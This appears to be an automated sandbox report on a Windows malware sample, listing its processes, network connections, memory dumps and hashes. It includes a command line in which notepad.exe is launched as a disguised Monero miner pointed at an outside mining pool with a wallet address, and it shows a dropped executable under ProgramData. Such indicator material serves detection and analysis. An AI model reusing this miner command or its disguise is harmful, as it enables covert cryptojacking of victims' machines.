C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe
"C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"
C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe
"C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"
C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe
"C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"
C:\Windows\notepad.exe
"C:\Windows\notepad.exe" -o pool.monero.hashvault.pro:5555:80 -u 48g2oLrkRG5JtnYA1pUukrYHgsu6aBqGTVxzZx6av6wvhBtgTHrKquWXMY2BJNnxs3aqj3U5RMnoZ6HaZYRMUouU8ke7kC4 -p trainwreck -v 0 -t 2
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2000 -ip 2000
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 1168
C:\ProgramData\windervt\3a9uw5a3e.exe
/prstb
Network
| Country | Destination | Domain | Proto |
| US | 20.189.173.7:443 | tcp | |
| US | 93.184.221.240:80 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | pool.monero.hashvault.pro | udp |
| US | 8.8.8.8:53 | pool.monero.hashvault.pro | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | pool.monero.hashvault.pro | udp |
| US | 8.8.8.8:53 | pool.monero.hashvault.pro | udp |
| NL | 142.250.179.142:80 | google.com | tcp |
| US | 8.8.8.8:53 | pool.monero.hashvault.pro | udp |
| US | 8.8.8.8:53 | pool.monero.hashvault.pro | udp |
| US | 8.8.8.8:53 | pool.monero.hashvault.pro | udp |
| US | 8.8.8.8:53 | pool.monero.hashvault.pro | udp |
Files
memory/1372-132-0x00000000008B0000-0x00000000008B7000-memory.dmp
memory/3504-133-0x0000000000000000-mapping.dmp
memory/3036-135-0x0000000000000000-mapping.dmp
memory/3504-134-0x0000000000400000-0x0000000000435000-memory.dmp
memory/2468-137-0x0000000000000000-mapping.dmp
memory/3036-138-0x0000000000400000-0x00000000004B7000-memory.dmp
memory/2468-140-0x0000000000400000-0x00000000004AA000-memory.dmp
memory/2468-143-0x0000000000400000-0x00000000004AA000-memory.dmp
memory/3036-142-0x0000000000400000-0x00000000004B7000-memory.dmp
memory/4424-144-0x0000000000400000-0x00000000004DA000-memory.dmp
memory/3504-141-0x0000000000400000-0x0000000000435000-memory.dmp
memory/4424-145-0x00000000004D3D30-mapping.dmp
memory/4424-146-0x0000000000400000-0x00000000004DA000-memory.dmp
memory/4424-148-0x0000000000400000-0x00000000004DA000-memory.dmp
memory/3036-149-0x0000000000400000-0x00000000004B7000-memory.dmp
memory/3504-151-0x0000000000BC0000-0x0000000000C26000-memory.dmp
memory/2468-152-0x0000000000400000-0x00000000004AA000-memory.dmp
memory/3504-154-0x00000000006D0000-0x00000000006DD000-memory.dmp
memory/3504-155-0x0000000002880000-0x000000000288C000-memory.dmp
memory/4424-150-0x0000000000400000-0x00000000004DA000-memory.dmp
memory/3504-147-0x0000000000400000-0x0000000000435000-memory.dmp
memory/1372-139-0x00000000008B0000-0x00000000008B7000-memory.dmp
memory/3504-136-0x0000000000400000-0x0000000000435000-memory.dmp
memory/4424-156-0x0000000000400000-0x00000000004DA000-memory.dmp
memory/2240-157-0x0000000000000000-mapping.dmp
memory/2468-158-0x0000000000400000-0x00000000004AA000-memory.dmp
memory/3504-159-0x0000000000BC0000-0x0000000000C26000-memory.dmp
memory/2000-160-0x0000000000000000-mapping.dmp
memory/3504-161-0x0000000000BC0000-0x0000000000C26000-memory.dmp
memory/2000-162-0x0000000000B70000-0x0000000000FA3000-memory.dmp
memory/2000-163-0x00000000012B0000-0x0000000001535000-memory.dmp
memory/2240-164-0x00000000028C0000-0x0000000002B45000-memory.dmp
memory/2000-165-0x00000000012B0000-0x0000000001535000-memory.dmp
memory/2240-166-0x00000000028C0000-0x0000000002B45000-memory.dmp
memory/2000-167-0x00000000012B0000-0x0000000001535000-memory.dmp
memory/3876-168-0x0000000000000000-mapping.dmp
C:\ProgramData\windervt\3a9uw5a3e.exe
| MD5 | 65c47159ad930504229825ef323aecf8 |
| SHA1 | 26974a01d0815a6f5cc63b34527a1a6a91ba2705 |
| SHA256 | 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16 |
| SHA512 | d2ccc975b97380f2c3d4fdc0d403f0b150b4e34eedc6b1e3f4d4d1ff773a6bb0d7dcb48cccfd83e8ac06ec2972006da9bc21481cadf02563dcc17cbe89888d77 |